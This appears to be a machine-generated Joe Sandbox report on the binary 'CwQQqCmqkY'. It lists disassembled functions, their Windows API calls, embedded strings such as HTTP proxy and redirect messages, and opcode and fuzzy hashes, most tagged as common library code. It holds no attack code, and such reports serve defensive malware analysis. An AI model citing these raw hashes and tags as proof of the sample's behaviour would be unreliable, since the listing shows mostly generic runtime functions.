Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s$The redirect target URL could not be parsed: %s
API String ID: 0-2860807360
Opcode ID: 1fee2508a4bdf2394bbf3f956df8516a859dc8e2df2edc9574a9393f47443514
Instruction ID: 52407c8008ab6140fe0a8eeb5709a8d43c5de9071bddd7283413e58568f4f6fc
Opcode Fuzzy Hash: 1fee2508a4bdf2394bbf3f956df8516a859dc8e2df2edc9574a9393f47443514
Instruction Fuzzy Hash: FDD1F571B0868381FB64FB79A4606F9A691AF89B84F880035DD6DC76D5DFBCD401C7A0

Function 00007FF7F13253E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B

TranslateName.LIBCMT ref: 00007FF7F132544E
TranslateName.LIBCMT ref: 00007FF7F1325489
GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF7F1314C34), ref: 00007FF7F13254D0
IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF7F1314C34), ref: 00007FF7F1325508
GetLocaleInfoW.KERNEL32 ref: 00007FF7F13256C5

Strings

utf8, xrefs: 00007FF7F13255EC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
String ID: utf8
API String ID: 3069159798-905460609
Opcode ID: d0acefbe756dc237107251eaf4980a3d70cf4ba222899f163021aefde55179de
Instruction ID: 043298ca79bf774197c79e84e49f7d06f58cf89918913662daac5af1fc1be520
Opcode Fuzzy Hash: d0acefbe756dc237107251eaf4980a3d70cf4ba222899f163021aefde55179de
Instruction Fuzzy Hash: 72919032B0878283EB24BF11A4012F9A3A4EF44B90F855179DA6D577C5DFBCE651C7A0

Function 00007FF7F1325E2C Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B

Part of subcall function 00007FF7F131B1CC: FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B211

GetUserDefaultLCID.KERNEL32(?,00000000,00000092,?), ref: 00007FF7F1325F9C

Part of subcall function 00007FF7F131B1CC: FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B23E
Part of subcall function 00007FF7F131B1CC: FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B24F
Part of subcall function 00007FF7F131B1CC: FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B260

EnumSystemLocalesW.KERNEL32(?,00000000,00000092,?,?,00000000,?,00007FF7F1314C2D), ref: 00007FF7F1325F83
ProcessCodePage.LIBCMT ref: 00007FF7F1325FC6
IsValidCodePage.KERNEL32 ref: 00007FF7F1325FD8
IsValidLocale.KERNEL32 ref: 00007FF7F1325FEE
GetLocaleInfoW.KERNEL32 ref: 00007FF7F132604A
GetLocaleInfoW.KERNEL32 ref: 00007FF7F1326066

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
String ID:
API String ID: 2591520935-0
Opcode ID: 696a505132d357ecb8150663cf8546c47922e71c1ae0f14a8c5cfa5dfe919522
Instruction ID: 745070d88b7ed71cf350eb76ef013daa24fda451ae97bc08fb1e6247f22aacb0
Opcode Fuzzy Hash: 696a505132d357ecb8150663cf8546c47922e71c1ae0f14a8c5cfa5dfe919522
Instruction Fuzzy Hash: B6715B62B186929BFB10BF60D8506FCA3B0BF48B54F844079CA2D536D5DFBCA945C7A0

Function 00007FF7F12FAB08 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7F12FAB24
RtlCaptureContext.KERNEL32 ref: 00007FF7F12FAB51
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7F12FAB6B
RtlVirtualUnwind.KERNEL32 ref: 00007FF7F12FABAC
IsDebuggerPresent.KERNEL32 ref: 00007FF7F12FAC00
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7F12FAC1D
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7F12FAC28

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e3873d3c8433cafce80df827fa39ed03d0e0d50b90b5499536117554b0a629f6
Instruction ID: 313494725e785daf9ead7544fc8b26bd589871e428191611c5a5f42555b18b1a
Opcode Fuzzy Hash: e3873d3c8433cafce80df827fa39ed03d0e0d50b90b5499536117554b0a629f6
Instruction Fuzzy Hash: 85317E72708B8186EB60AF60E8403EEB360FB84754F84443ADA5E47B98EF7CD548C764

Function 00007FF7F12AB6B0 Relevance: 10.3, Strings: 8, Instructions: 269COMMON

Download Yara Rule

Strings

%s_proxy, xrefs: 00007FF7F12AB850
NO_PROXY, xrefs: 00007FF7F12AB7C9
ALL_PROXY, xrefs: 00007FF7F12AB8D3
no_proxy, xrefs: 00007FF7F12AB7B2
http_proxy, xrefs: 00007FF7F12AB885
memory shortage, xrefs: 00007FF7F12AB750
Uses proxy env variable %s == '%s', xrefs: 00007FF7F12AB7E3, 00007FF7F12AB8ED
all_proxy, xrefs: 00007FF7F12AB8BC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: EnvironmentVariable
String ID: %s_proxy$ALL_PROXY$NO_PROXY$Uses proxy env variable %s == '%s'$all_proxy$http_proxy$memory shortage$no_proxy
API String ID: 1431749950-4066991793
Opcode ID: 2a47c81a783b4396a59bf2d247ffd8f3b1a8bcc72f4b13286570d74efc1b7c1a
Instruction ID: 63d8e1dd3f653fc3efb25724ff3d8ff608f24c1f9be44f863cc7debcb3dd53ea
Opcode Fuzzy Hash: 2a47c81a783b4396a59bf2d247ffd8f3b1a8bcc72f4b13286570d74efc1b7c1a
Instruction Fuzzy Hash: AAC19222B0978285EB25AFA594143BDA790AF45BA8F890036CE6D473D5DFBCE544C3B0

Function 00007FF7F12C3FB0 Relevance: 10.1, Strings: 8, Instructions: 72COMMON

Download Yara Rule

Strings

%5lld, xrefs: 00007FF7F12C3FC5
%4lldk, xrefs: 00007FF7F12C3FDE
%2lld.%0lldG, xrefs: 00007FF7F12C406A
%4lldP, xrefs: 00007FF7F12C40CD
%4lldG, xrefs: 00007FF7F12C40A4
%2lld.%0lldM, xrefs: 00007FF7F12C3FF9
%4lldT, xrefs: 00007FF7F12C40C0
%4lldM, xrefs: 00007FF7F12C404C

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
API String ID: 0-3476178709
Opcode ID: 926c7dbe96f46fef2906cb7a578c185fd222e910dad2f2049cd95e2f94ec7f1b
Instruction ID: 45a8831c65694ce23ffc03dd4f2e4872c5f286305ee91f91faee41ef0010d3f5
Opcode Fuzzy Hash: 926c7dbe96f46fef2906cb7a578c185fd222e910dad2f2049cd95e2f94ec7f1b
Instruction Fuzzy Hash: 10216050F4DA8A43FF18EBD5A8107F682605F547A4FC00536EE2E463D29FED6595C2E0

Function 00007FF7F128DE8C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F128DF87

Strings

M&S works hard to make better products and shops. They want to sell even more in the next years., xrefs: 00007FF7F128E0F8

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: M&S works hard to make better products and shops. They want to sell even more in the next years.
API String ID: 3668304517-2797344925
Opcode ID: 141e15260c01d24147758a483f0d9dc38c5add2af1801bd5f521c6e652894aca
Instruction ID: 5d9a2d312e377acfa5b55f7e44bd4c009b217f0ae99ad4bd320ab6721fd4e0a3
Opcode Fuzzy Hash: 141e15260c01d24147758a483f0d9dc38c5add2af1801bd5f521c6e652894aca
Instruction Fuzzy Hash: 88E10823B04B8586EB10EBA5D4402ADB361FB54BA8F444636DE6CA7BD9DF78D481C390

Function 00007FF7F1321B60 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1321BAC
FindFirstFileExW.KERNEL32 ref: 00007FF7F1321CB6

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: bb18d0758a06c4f01855e773e506677ea6795f6f04079887c2e99b598b8666a2
Instruction ID: 4447a2511bbd82515f0e1335edb8864ea6728e79eaee0b35656df51af6df0023
Opcode Fuzzy Hash: bb18d0758a06c4f01855e773e506677ea6795f6f04079887c2e99b598b8666a2
Instruction Fuzzy Hash: 29B10926B186D682EB60FB2196001B9E360EF44BE4F844179ED7D87BC9DFBCE4418390

Function 00007FF7F12F75D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 00007FF7F12F75EC
CryptCreateHash.ADVAPI32 ref: 00007FF7F12F7618
CryptReleaseContext.ADVAPI32 ref: 00007FF7F12F7627

Strings

@, xrefs: 00007FF7F12F75DC

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Crypt$Context$AcquireCreateHashRelease
String ID: @
API String ID: 4045725610-2766056989
Opcode ID: a2956b10518a7214aa3f749e753e924ed0c318a9c157f36a21e53d8cdd5495dc
Instruction ID: 06a2a0f272c9ada60c7034c5d7c55feefc0473d665240d77d65f31192a6069b6
Opcode Fuzzy Hash: a2956b10518a7214aa3f749e753e924ed0c318a9c157f36a21e53d8cdd5495dc
Instruction Fuzzy Hash: CFF0966AF1061283F7505B75E801766A390EF94B48F844034CE5C867D4DF7CD0969B54

Function 00007FF7F12EC750 Relevance: 6.7, Strings: 5, Instructions: 447COMMON

Download Yara Rule

Strings

digest_sspi: MakeSignature failed, error 0x%08lx, xrefs: 00007FF7F12EC99E
realm, xrefs: 00007FF7F12ECA7C
WDigest, xrefs: 00007FF7F12EC7C4, 00007FF7F12ECBD9
schannel: InitializeSecurityContext failed: %s, xrefs: 00007FF7F12ECDC9
SSPI: could not get auth info, xrefs: 00007FF7F12EC7DA

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID:
String ID: SSPI: could not get auth info$WDigest$digest_sspi: MakeSignature failed, error 0x%08lx$realm$schannel: InitializeSecurityContext failed: %s
API String ID: 0-3841482288
Opcode ID: 2ac1f080fc3d62cedc84a9dd9ade597f284205f3cebe6b502dd35435eae8c97e
Instruction ID: d9303b8fe93f696b3cf82e3c3eab19b7f086c141cf59a84d18fc3715ea499fec
Opcode Fuzzy Hash: 2ac1f080fc3d62cedc84a9dd9ade597f284205f3cebe6b502dd35435eae8c97e
Instruction Fuzzy Hash: CB228D32B08B4286EB10EFA9E4506A9B7A4FF44B94F854039DA6D837D4EFBCD455C390

Function 00007FF7F12F7660 Relevance: 6.0, APIs: 4, Instructions: 33encryptionCOMMON

Download Yara Rule

APIs

CryptGetHashParam.ADVAPI32 ref: 00007FF7F12F7691
CryptGetHashParam.ADVAPI32 ref: 00007FF7F12F76B7
CryptDestroyHash.ADVAPI32 ref: 00007FF7F12F76C6
CryptReleaseContext.ADVAPI32 ref: 00007FF7F12F76D6

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Crypt$Hash$Param$ContextDestroyRelease
String ID:
API String ID: 2110207923-0
Opcode ID: 8036c8465d3e1957d520ff9ed75ab888746bb8647a4f93dc55eeb927d4503f62
Instruction ID: eeb5049cac0606979cecf688335e572f841248e2337b3d848457be10c9c71f7e
Opcode Fuzzy Hash: 8036c8465d3e1957d520ff9ed75ab888746bb8647a4f93dc55eeb927d4503f62
Instruction Fuzzy Hash: 01018F6A70864586EB10DF65E45432AF370FF84B84F944035DA5D46AA8CF7DD444CBA0

Function 00007FF7F13195D4 Relevance: 5.5, APIs: 3, Instructions: 1005COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1319A0A
_get_daylight.LIBCMT ref: 00007FF7F1319AA5
_get_daylight.LIBCMT ref: 00007FF7F1319ABE

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID:
API String ID: 1286766494-0
Opcode ID: f4c3e483ea8825688196959c4c1cecb123d2989cce997fc0fe8636b975c878ea
Instruction ID: 923e34f30287d4969a16f31b2373d24a26d7efe4cb544a5a35e91e7e591188be
Opcode Fuzzy Hash: f4c3e483ea8825688196959c4c1cecb123d2989cce997fc0fe8636b975c878ea
Instruction Fuzzy Hash: C292F532D0868287D724AF249560179B7A5FF847A8F864139DB9D27BD8DFBCD510C3A0

Function 00007FF7F1320638 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 255COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1320683

Part of subcall function 00007FF7F1303258: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F1303207,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F1303261
Part of subcall function 00007FF7F1303258: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F1303207,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F1303286

Strings

\, xrefs: 00007FF7F13207E8
PATH, xrefs: 00007FF7F132072E

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID: PATH$\
API String ID: 4036615347-1896636505
Opcode ID: f9c09e629afdb956bd6d43dcce996c1485f31addbb4285abb05a7d0152a709e6
Instruction ID: bfff0ffabd142fd580e1155616e38bd36fe654bd13e6b458c3d7fe7eaedc806e
Opcode Fuzzy Hash: f9c09e629afdb956bd6d43dcce996c1485f31addbb4285abb05a7d0152a709e6
Instruction Fuzzy Hash: E391E662F0828687FB64BB61541027EA6E06F40798F94057CDE3E077D6CFFDA44582E1

Function 00007FF7F12D1C72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

bind.WS2_32 ref: 00007FF7F12D1E00
WSAGetLastError.WS2_32 ref: 00007FF7F12D1E0A

Strings

bind() failed; %s, xrefs: 00007FF7F12D1E25

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLastbind
String ID: bind() failed; %s
API String ID: 2328862993-1141498939
Opcode ID: 99400ffd2d1bc5ff557757cc4172926078d032e46def15c2dff9d9193e9be3d4
Instruction ID: 9ab4393d3fc27dcde61bfb2de3e53c7386120a17239992c9ff36bc24f64d5622
Opcode Fuzzy Hash: 99400ffd2d1bc5ff557757cc4172926078d032e46def15c2dff9d9193e9be3d4
Instruction Fuzzy Hash: 4D51BE32A08B8286E715AF25E8547A9B3A4FF48B84F840039CE6D87781DF7CE551C7A0

Function 00007FF7F12D1EF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 129networkCOMMON

Download Yara Rule

APIs

bind.WS2_32 ref: 00007FF7F12D2031
WSAGetLastError.WS2_32 ref: 00007FF7F12D203B

Strings

bind() failed; %s, xrefs: 00007FF7F12D2056

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLastbind
String ID: bind() failed; %s
API String ID: 2328862993-1141498939
Opcode ID: c2332c4a382c98373413cc2f2609190650d36e5367d414fb5382a81917a1e6a8
Instruction ID: 59637b77e27131c101c136ec12fe11651c193f1bf1e9c9b911e3104c21698041
Opcode Fuzzy Hash: c2332c4a382c98373413cc2f2609190650d36e5367d414fb5382a81917a1e6a8
Instruction Fuzzy Hash: 5851A432B08B8186E711AF65D8403A9B395FB58B88F440035DE1D8B7D5DFBCD441C3A0

Function 00007FF7F13101B0 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF7F1310216
memcpy_s.LIBCPMT ref: 00007FF7F1310241

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 58c5b441fcc557dde308f798edace5a3fe026a1be206aa60db9152cb5b0e9c63
Instruction ID: e0331b25a75fa402ff4cc38e24753be5171af211c86534b1533241d0acee4cda
Opcode Fuzzy Hash: 58c5b441fcc557dde308f798edace5a3fe026a1be206aa60db9152cb5b0e9c63
Instruction Fuzzy Hash: 4AC12672F1828587D724DF15A08466AF791FB88794F828139DB5E67784DF7EE801CB80

Function 00007FF7F13258A8 Relevance: 4.7, APIs: 3, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B

Part of subcall function 00007FF7F131B1CC: FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B211

GetLocaleInfoW.KERNEL32 ref: 00007FF7F1325914

Part of subcall function 00007FF7F131BB6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131BB89

GetLocaleInfoW.KERNEL32 ref: 00007FF7F132595D

Part of subcall function 00007FF7F131BB6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131BBE2

GetLocaleInfoW.KERNEL32 ref: 00007FF7F1325A25

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

